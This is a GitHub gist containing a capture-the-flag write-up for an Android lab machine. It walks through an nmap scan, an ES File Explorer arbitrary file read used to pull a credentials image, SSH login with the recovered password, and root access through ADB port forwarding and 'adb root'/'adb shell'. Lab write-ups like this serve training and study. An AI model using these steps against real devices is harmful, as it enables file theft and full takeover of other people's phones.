Skip to content

Instantly share code, notes, and snippets.

Created August 13, 2021 17:50
Show Gist options
  • Save 0xEmbo/082139631e2590ce314d49d87880b35e to your computer and use it in GitHub Desktop.
Save 0xEmbo/082139631e2590ce314d49d87880b35e to your computer and use it in GitHub Desktop.



Starting Nmap 7.80 ( ) at 2021-07-02 15:57 EET
Nmap scan report for (
Host is up (0.14s latency).

2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
35971/tcp closed   unknown
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Device: phone

First of all, lets look for exploits for these services (ES File Explorer & Bukkit JSONAPI). Found an arbitrary file read exploit for ( ES File Explorer and didn't find any other exploits, so lets just try it.

By reading the exploit code, it's sending a POST request with Content-Type: application/json header and a json POST data as {"command": cmd} to

The available commands to use are:

Command Description
listFiles List all files
listPics List all pictures
listVideos List all videos
listAudios List all audios
listApps List installed applications
listAppsSystem List system apps
listAppsPhone List communication related apps
listAppsSdcard List applications on SDCard
listAppsAll List all applications
getFile Download a file
getDeviceInfo Get device info

Lets first try the exploit manually before running the python script. Now visit intercept the request with burp or ZAP and send to repeater and edit the request as the exploit says. And we got a response with the device info. ![[Pasted image 20210702162329.png]]

Now that we understand how the exploit works, lets run the script because it parses the json response and make our life easier.

While enumeration i found that the ES File Explorer version is, that's why the exploit works ( if there's an exploit for a specific version, it may work on older versions too). ![[Pasted image 20210702165426.png]]

While trying every command i tried listPics and found interesting picture (creds.jpg). ![[Pasted image 20210702175549.png]] I downloaded this picture using python3 getFile /storage/emulated/0/DCIM/creds.jpg and opened it. It has credentials in it.

kristi:Kr1sT!5h@Rp3xPl0r3! ![[Pasted image 20210702175752.png]]

Now lets ssh to the box with these creds and we are in. ![[Pasted image 20210702180057.png]]

Getting root

Doing some research on the ports we found earlier, Port 5555 is for Android Debug Bridge (ADB) connections. And found on hacktricks how to use this service to get root shell.


  • First, We have to do port forwarding using ssh because the service is running on localhost only. ssh -p 2222 -L 1337:localhost:5555 kristi@ ![[Pasted image 20210702201835.png]] That means ==>
  • Connect to ADB service (port 5555) using adb tool. adb connect <IP>:<PORT> ![[Pasted image 20210702201811.png]]
  • Check if the phone is connected to your pc. adb devices ![[Pasted image 20210702203028.png]]
  • Now using adb tool we can do anything on the device, so to get root type adb root ![[Pasted image 20210702201727.png]] to restart adbd daemon with root permissions.
  • Connect again to the ADB service. adb connect <IP>:<PORT>
  • Finally. adb shell ![[Pasted image 20210702201754.png]]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment